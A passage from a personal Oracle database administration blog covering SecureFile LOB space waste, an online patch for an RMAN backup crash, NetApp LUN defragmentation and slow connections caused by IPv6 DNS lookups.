FACT2: this 24% of rows takes 1769095 MB (sic!) which means 1.72TB consumed for just 1/4 of rows.

primary:sys@XXXX> select table_name, tablespace_name, chunk, pctversion, retention, in_row, securefile, retention from dba_lobs where segment_name = 'SYS_LOB0000099004C00008$$';

------------------------------ ------------------------------ ---------- ---------- ---------- --- --- ----------
MAGIC_TABLE                    LOB4K                                4096                       YES YES


FACT3: 24% of rows have data stored in separate tablespace dedicated for LOBs with 4kB blocksize.

primary:sys@XXXX> SELECT CASE
  ELSE 'even bigger'
  END x,
  COUNT(*) cnt
  ELSE 'even bigger'
  END;   2    3    4    5    6    7    8    9   10   11   12   13   14   15   16   17  

X                  CNT
----------- ----------
<7kB                76
<4kB           3215841
<6kB            701916


We can double-check Oracle on it’s math here. There is not a single row in that table that has LOB entry bigger than 7kB, still everything is stored out-of-line (technically bigger than something like 3600-3900 bytes which is max size for inline LOBs) in LOB segment named SYS_LOB0000099004C00008$$ is taking 1769095 MB (sick!).
So actually 701916+76 rows potentially consume 1769095 MB in datafiles, which gives us 2.5MB of waste per row. This table is really heavy duty OLTP table which means really lots of INSERT/UPDATE/DELETE concurrent stuff, I’m not even sure if the application responsible, is doing updates against they PAYLOAD column, from my analysis it is just inserts row once (with LOB via JDBC) and sometime later deletes it. All I can say about the application in scope is the fact that it is “database interdependent”.

Let’s now calculate theory behind space calculation (A.K.A what should be really used if there would be no overhead). Space that should be used for PAYLOAD column stored in LOBSEGMENT should be:

  • 3215841 rows stored inside tablespace with the rest of data; table segment for MAGIC_TABLE already stores 6.7GB which contains data for those 3215841 rows, so we can skip it
  • (701916+76) rows stored in separated tablespace LOB4K, which means that for rows bigger than 3600..3900 this translates to at least 1 CHUNK (4kB) and maximum up to 2 CHUNKs (8kB) because we do not have anything bigger than 7kB; we can assume even worse scenario that single CHUNK(4kB) would require up to 2 blocks in 4kB tablespace due to some overheads. So even in the worst case we have (701916+76)*4096*2/1024/1024/1024 =~ 5.36GB

So what we really have is 1727 GB used to store 5.36GB. Closing this part i would like to give you an idea how hard SecureFile LOB processing is for Oracle, they seem to be struggling with it for couple years. The list of bugs for 11.x series include:


I’m certain you could find even more. Even with the most recent SecureFilles are still being patched, as they fixed bug 14176879 in in Critical Patch Updates April 2013. Bug 14176879 stands for “Extensive growth of Securefiles segments undergoing updates”.

To make it even more appealing to use SecureFiles (irony intended), here’s the next real the BIG THING: in section “Using ALTER TABLE with SecureFiles LOBs” in official documentation, it is written: “Note that the SHRINK option is not supported for SecureFiles LOBs”. Yeah, now you can scream ;)

Part 1: Oracle SecureFile LOB is better than BasicFile, isn’t it?

Thursday, June 6th, 2013

According to Oracle Technical Marketing SecureFiles are superior in every way to the older BasicFile LOB implementation. Part1 of this articles is going to try to prove it for strictly OLTP like workloads (having LOB column as requirement for application that is doing a lot of heavy/duty short & quick transaction requiring to store data that VARCHAR2 type is not capable of). This series is not going to concentrate on the LOBs used for anything bigger than 5300 bytes. We also want to take profit from the LOB inline storage option that stores LOB data together with the table data. The benchmarks were performed on 2 sockets 8 cores Intel Xeon box running Oracle with some local RAID1 storage. Before each iteration shared pool and buffer cache were flushed, log switch forced (BTW: DB running without archive redo logs), dedicated tablespaces recreated, workload has been parallel (like in OLTP) using 8 jobs hitting single table creating (intended) contention, each run has been run at least 3 times to guarantee at least some kind of “repeatability”. The table has not been partitioned and it looked like this:

create table t_blob ( id number primary key, l1 clob ) tablespace blobs
lob ( l1 ) store as &blob_type (
tablespace blobs &inrow storage in row chunk &chunk &cache &logging

there are several variables set like this:

  • &inrow – always “enable” for purposes of this test
  • &chunk – always set for 4k for purposes of this test
  • &cache – always set to CACHE
  • &logging – always set
  • &blob_type – securefile, basicfile
  • tablespace – the tested values were 4k and 8k, each time setting db_buffer_cache for the appriopiate buffer to 1.5GB
  • payload for LOB data – always generated randomly using dbms_random package, with with length of minimum from 300 bytes (incremented with step of 2000 bytes) up to 5300 bytes (incremented also by 2000)

The results are below, first space efficiency BasicFile vs SecureFile:

Second, elapsed time of execution comparing BasicFile VS SecureFile:

But that’s not the end, stay tuned for part 2 where I’ll show that the world is not so beautiful as it looks like :)


Oracle online patching for bug 13817131 (backport for ORA-7445 near ksfqfcrx()+X during RMAN backups)

Wednesday, October 3rd, 2012

Oracle seems to be affected sometimes (the bug manifest itself only in highly utilized environments as per my observations) by ORA-7445 during RMAN backups. The first symptoms are like this in the RMAN log:
channel t1: starting piece 1 at 17-SEP-12
RMAN-00571: ===========================================================
RMAN-00569: =============== ERROR MESSAGE STACK FOLLOWS ===============
RMAN-00571: ===========================================================
RMAN-03009: failure of backup command on t1 channel at 09/17/2012 16:01:23
RMAN-10038: database session for channel t1 terminated unexpectedly

The alert log contains information that incident has been registered and the most interesting entry is this:
ORA-07445: exception encountered: core dump [ksfqfcrx()+1143] [SIGSEGV] [ADDR:0x8] [PC:0xA3E2E3] [Address not mapped to object] []

Starting from this point, sooner or later all RMAN backups are going to fail. My observation is that this is only matter of time. RAC gives some additional headroom, because one can switch making backups to next node, but please be advised that as this is some kind of memory corruption going on, this will also happen on next nodes. You need to patch it.

The GDB backtrace shows excactly the function

(gdb) where
#0 0x0000003513630285 in raise () from /lib64/
#1 0x0000003513631d30 in abort () from /lib64/
#2 0x0000000008130445 in skgdbgcra ()
#3 0x00000000067a67f1 in sksdbgcra ()
#4 0x0000000004977828 in ksdbgcra ()
#5 0x000000000679e3a5 in ssexhd ()
#6 <signal handler called>
#7 0x0000000000a3e2e3 in ksfqfcrx ()
#8 0x0000000007018463 in krbbOpenOutput ()
#9 0x000000000702afe7 in krbbpcint ()
#10 0x000000000702e393 in krbbpc ()
#11 0x0000000008a47cea in krbibpc ()
#12 0x00000000093f8131 in pevm_icd_call_common ()
#13 0x00000000093ed460 in pfrinstr_ICAL ()
#14 0x00000000093f10b9 in pfrrun_no_tool ()
#15 0x00000000093ef78d in pfrrun ()
#31 0x0000000001dc0d14 in ssthrdmain ()
#32 0x0000000000a0b271 in main ()
(gdb) ... serveral "up" cmds to get to the #6 stack frame
(gdb) info registers rax r12
rax 0x0 0
r12 0x7fd3ac78bf20 140547108421408
(gdb) disas
0x0000000000a3e2d6 <ksfqfcrx+1130>: callq 0x4838ada <ksfq_ibuf>
0x0000000000a3e2db <ksfqfcrx+1135>: mov 0xcd0(%r12),%rax <--- r12</strong>
0x0000000000a3e2e3 <ksfqfcrx+1143>: orl $0x4,0x8(%rax) <--- crash, due to %rax being 0 and the instruction is addres at $rax register + 8 (SEG FAULT)
0x0000000000a3e2e7 <ksfqfcrx+1147>: jmpq 0xa3e0bc <ksfqfcrx+592>

More or less the issue is documented under Oracle Support note 1482775.1 and the only workaround is to upgrade to 12.1 or which is a little joke (we all know that 12.1 is going to be such great database version that it won’t have even an single bug… all is fixed in 12.1 ;) ). Now in my opinion one will have several options:

  1. you agree to loose backups of mission critical production envs (change RMAN ARCHIVELOG POLICY to NONE?) or fallback to backups taken on DataGuard standby (delete force archivelog is your friend… or enemy actually ;) )
  2. fallback to remaining RAC nodes and restart one of the RAC nodes… (restart of instances seems to avoid the problem for sometime)
  3. do nothing and have downtime (due to ARCH stuck problem, due to FRA filling up)
  4. request a backport for the bug mentioned in in 1482775.1

We’ve went with options b + d. Later I’ve raised escalation call for the case we’ve raised initially. Several days later we had patch ready to be applied, the nice thing about it (patch 13817131) was that it is possible to apply it completely in online mode even on RAC (no need to shutdown anything), just live memory patching! Here are the details from the lab:

[oracle@labr2 13817131]$ opatch apply online -connectString ORCL2:::labr1,ORCL1:::labr2
Oracle Interim Patch Installer version
Copyright (c) 2012, Oracle Corporation.  All rights reserved.

Oracle Home       : /u01/app/oracle/product/11.2.0/dbhome_1
Central Inventory : /u01/app/oraInventory
   from           : /u01/app/oracle/product/11.2.0/dbhome_1/oraInst.loc
OPatch version    :
OUI version       :
Log file location : /u01/app/oracle/product/11.2.0/dbhome_1/cfgtoollogs/opatch/13817131_Sep_27_2012_12_55_35/apply2012-09-27_12-55-35PM_1.log

The patch should be applied/rolled back in '-all_nodes' mode only.
Converting the RAC mode to '-all_nodes' mode.
Applying interim patch '13817131' to OH '/u01/app/oracle/product/11.2.0/dbhome_1'
Verifying environment and performing prerequisite checks...
All checks passed.
Backing up files...

Patching component oracle.rdbms,
Installing and enabling the online patch 'bug13817131.pch', on database 'ORCL1'.

Verifying the update...

Patching in all-node mode.

Updating nodes 'labr1'
   Apply-related files are:
     FP = "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/copy_files.txt"
     DP = "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/copy_dirs.txt"
     MP = "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/make_cmds.txt"
     RC = "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/remote_cmds.txt"

Instantiating the file "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/copy_files.txt.instantiated" by replacing $ORACLE_HOME in "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/copy_files.txt" with actual path.
Propagating files to remote nodes...
Instantiating the file "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/copy_dirs.txt.instantiated" by replacing $ORACLE_HOME in "/u01/app/oracle/product/11.2.0/dbhome_1/.patch_storage/13817131_Sep_25_2012_08_46_38/rac/copy_dirs.txt" with actual path.
Propagating directories to remote nodes...
Installing and enabling the online patch 'bug13817131.pch', on database 'ORCL2' on node 'labr1'.

Patch 13817131 successfully applied
Log file location: /u01/app/oracle/product/11.2.0/dbhome_1/cfgtoollogs/opatch/13817131_Sep_27_2012_12_55_35/apply2012-09-27_12-55-35PM_1.log

OPatch succeeded.
[oracle@labr2 13817131]$

Meanwhile in the alertlog
Thu Sep 27 12:56:09 2012
Patch file bug13817131.pch is out of sync with oracle binary; performing fixup
Patch file bug13817131.pch has been synced with oracle binary
Patch bug13817131.pch Installed – Update #1
Patch bug13817131.pch Enabled – Update #2
Thu Sep 27 12:56:11 2012
Online patch bug13817131.pch has been installed
Online patch bug13817131.pch has been enabled

Technical details follow, as you can see the dynamic library is being added without any interruption to running binaries. Probably some functions are also being redirected to this dynamic library to:

[root@labr2 ~]# ps -ef | grep pmon
oracle    2618     1  0 11:29 ?        00:00:01 asm_pmon_+ASM1
oracle    3013     1  0 11:30 ?        00:00:01 ora_pmon_ORCL1
root      4947  3844  0 13:02 pts/0    00:00:00 grep pmon
[root@labr2 ~]# lsof -p 3013 |grep bug
oracle  3013 oracle  mem    REG             202,17    217221 1183112 /u01/app/oracle/product/11.2.0/dbhome_1/hpatch/
[root@labr2 ~]#
[root@labr2 ~]# pmap -d 3013|grep bug
00007fcb51e8c000     168 r-x-- 0000000000000000 0ca:00011
00007fcb51eb6000    1020 ----- 000000000002a000 0ca:00011
00007fcb51fb5000      12 rwx-- 0000000000029000 0ca:00011
[root@labr2 ~]#

WAFL performance VS sequential reads: part II, FC LUN defragmentation

Monday, June 27th, 2011

After partI – where i’ve been simulating typical Oracle workload (generating 70:30 read to write ratio on FC LUN) and creating snapshots – i’ve wanted to try different performance tests. In order to achieve the same performance characteristics, so i’ve deleted all my snapshots, so my FlexVol ended up again in 40% utilization:

X> snap list full_aggr_test
Volume full_aggr_test

No snapshots exist.
X> df -g full_aggr_test
Filesystem               total       used      avail capacity  Mounted on
/vol/full_aggr_test/       50GB       20GB       29GB      40%  /vol/full_aggr_test/
/vol/full_aggr_test/.snapshot        0GB        0GB        0GB     ---%  /vol/full_aggr_test/.snapshot

Later i’ve executed Orion stress test, in a identical way like in partI on the same enviorniment. As you can see still the LUN is fragmented because any kind of sequential read is going to be impacted (maximum read observed ~17MB/s):

root@Y:# grep Maximum orion*
orion_20110627_1116_summary.txt:Maximum Large MBPS=17.07 @ Small=0 and Large=9
orion_20110627_1116_summary.txt:Maximum Small IOPS=683 @ Small=24 and Large=0

So in order to fight with this performance issue one can establish the root cause:

X> reallocate measure /vol/full_aggr_test
Reallocation scan will be started on '/vol/full_aggr_test'.
Monitor the system log for results.

System log will reveal this:

Mon Jun 27 07:35:31 EDT [X: wafl.scan.start:info]: Starting WAFL layout measurement on volume full_aggr_test.
Mon Jun 27 07:35:32 EDT [X: wafl.reallocate.check.highAdvise:info]: Allocation check on '/vol/full_aggr_test' is 8, hotspot 0 (threshold 4), consider running reallocate.

This seems to be identical to running measure on the LUN:

X> reallocate measure  /vol/full_aggr_test/lun01
Reallocation scan will be started on '/vol/full_aggr_test/lun01'.
Monitor the system log for results.

Log will show this:

Mon Jun 27 07:45:21 EDT [X: wafl.scan.start:info]: Starting WAFL layout measurement on volume full_aggr_test.
Mon Jun 27 07:45:21 EDT [X: wafl.reallocate.check.highAdvise:info]: Allocation check on '/vol/full_aggr_test/lun01' is 8, hotspot 0 (threshold 4), consider running reallocate.

So in both cases we were recommended to defragment the LUN, but keep in mind that this is a rather resource hungry operation, as it might involve reading and rewriting the full contents of the data!

X> reallocate start -f -p /vol/full_aggr_test/lun01
Reallocation scan will be started on '/vol/full_aggr_test/lun01'.
Monitor the system log for results.

Log will show that the operation has started …

Mon Jun 27 07:46:23 EDT [X:]: The aggregate 'sm_aggr1' contains blocks that require redirection; 'revert_to' might take longer than expected.
Mon Jun 27 07:46:23 EDT [X: wafl.scan.start:info]: Starting file reallocating on volume full_aggr_test.

As you can see it is rather low CPU activity however , physical utilization of the disks is reported as high (don’t be fooled by low write activity – this is function of time, it does perform a lot of writes later):

 CPU   NFS  CIFS  HTTP   Total    Net kB/s   Disk kB/s     Tape kB/s Cache Cache  CP   CP Disk    FCP iSCSI   FCP  kB/s iSCSI  kB/s
                                  in   out   read  write  read write   age   hit time  ty util                 in   out    in   out
 10%     0     0     0     157     0     0  22372  19320     0     0    53s  94%  58%  :   97%    156     0   589   175     0     0
 10%     1     0     0     108     0     0  24884      0     0     0    53s  94%   0%  -   92%    106     0   256   585     0     0
  9%     0     0     0     101     0     0  25284     24     0     0    53s  94%   0%  -   93%    100     0   421   260     0     0
 12%     0     0     0     627    20    25  25620      8     0     0    53s  94%   0%  -   92%    511     0   297   132     0     0
 11%     0     0     0     792     0     0  22832      0     0     0    53s  94%   0%  -   90%    652     0   670   461     0     0
  6%     1     0     0      81     1     1  25232     24     0     0    53s  99%   0%  -   92%     78     0   233   253     0     0

One can monitor the progress by using “status” command and in fact observe

X> reallocate status -v /vol/full_aggr_test/lun01
Reallocation scans are on
        State: Reallocating: Block 1347456 of 5242880 (25%), updated 1346434
        Flags: doing_force,measure_only,repeat,keep_vvbn
    Threshold: 4
     Schedule: n/a
     Interval: 1 day
 Optimization: 8
  Measure Log: n/a
X> reallocate status -v /vol/full_aggr_test/lun01
Reallocation scans are on
        State: Idle
        Flags: measure_only,repeat
    Threshold: 4
     Schedule: n/a
     Interval: 1 day
 Optimization: 8
  Measure Log: n/a

X> sysstat -x 1
 CPU   NFS  CIFS  HTTP   Total    Net kB/s   Disk kB/s     Tape kB/s Cache Cache  CP   CP Disk    FCP iSCSI   FCP  kB/s iSCSI  kB/s
                                  in   out   read  write  read write   age   hit time  ty util                 in   out    in   out
 53%     1     0     0     678     1     1  29428   1556     0     0     1   72%   9%  :   11%    573     0   311 21077     0     0
 34%     0     0     0     443     0     0  22028     32     0     0     1   78%   0%  -    5%    442     0  1068 20121     0     0
 40%     0     0     0     172     0     0  16360      0     0     0     1   77%   0%  -    4%    171     0   367 14450     0     0

Later results indicate that indeed sequential reads are back to their top value (~42MB/s) and this was our starting point on fresh FlexVol inside LUN in partI…

root@Y:# grep Maximum orion*
orion_20110627_1208_summary.txt:Maximum Large MBPS=42.73 @ Small=0 and Large=9
orion_20110627_1208_summary.txt:Maximum Small IOPS=645 @ Small=25 and Large=0

In the next series i’ll try to investiage the various AIX JFS2/CIO behaviours and to some degree the performance characteristics of Netapp storage and it’s options (e.g. read_realloc option). Stay tuned…

A pretty nice Oracle Exadata marketing video

Monday, June 27th, 2011

A nice video in “Shift Happens” style:

… now i’m wondering how it works in reality ;)

Long remote Oracle/SQLNet connection times due to the IPv6 enabled on RHEL 5.x

Sunday, January 9th, 2011

On one of my RAC clusters in lab i’ve noticed that it took sometimes up to 5-15 seconds in order to connect to Oracle database instead of maximum 1s. It was happening on some old VMs back from 2008. The root-cause analysis showed that each RAC node was doing DNS search for it’s own name, which was something i wouldn’t expect normally. Paying attenting to the details showed that Oracle RDBMS was performing DNS on it’s own server name , but not for A DNS entry, but for AAAA (IPv6). Yes libc (DNS resolver) was asking REMOTE DNS SERVERS for it’s own server name – but in IPv6 format (AAAA) – because it couldn’t find the required info via /etc/hosts. This is going to happen even with NETWORING_IPV6=OFF in /etc/sysconfig/network.

The solution was pretty easy after estabilishing the root casue. Just ensure that:

  • all RAC nodes are in /etc/hosts
  • all RAC nodes . are in /etc/hosts
  • that resolv.conf provides at least 2-3 DNS servers that are reachable within max 50ms (check each one with dig(1)). resolv.conf can have options to perform round robin accross those. [my enviorniment was affected by this]
  • you have disabled IPv4 via NETWORKING_IPV6
  • you have aliased IPv6 to “off” in kernel modules to completley disable ipv6 kernel functionality, this in turn also disables any libc IPv6 action [my enviorniment was affected by this, just add "alias net-pf-10 off" to the modprobe.conf]
  • lsmod does NOT displays ipv6 (kernel module is not loaded)

Of course as you can see I wouldn’t be affected by this one if the DNS name server wouldn’t misconfigured in the first place (my lab in 2008 looked differently than it looks now).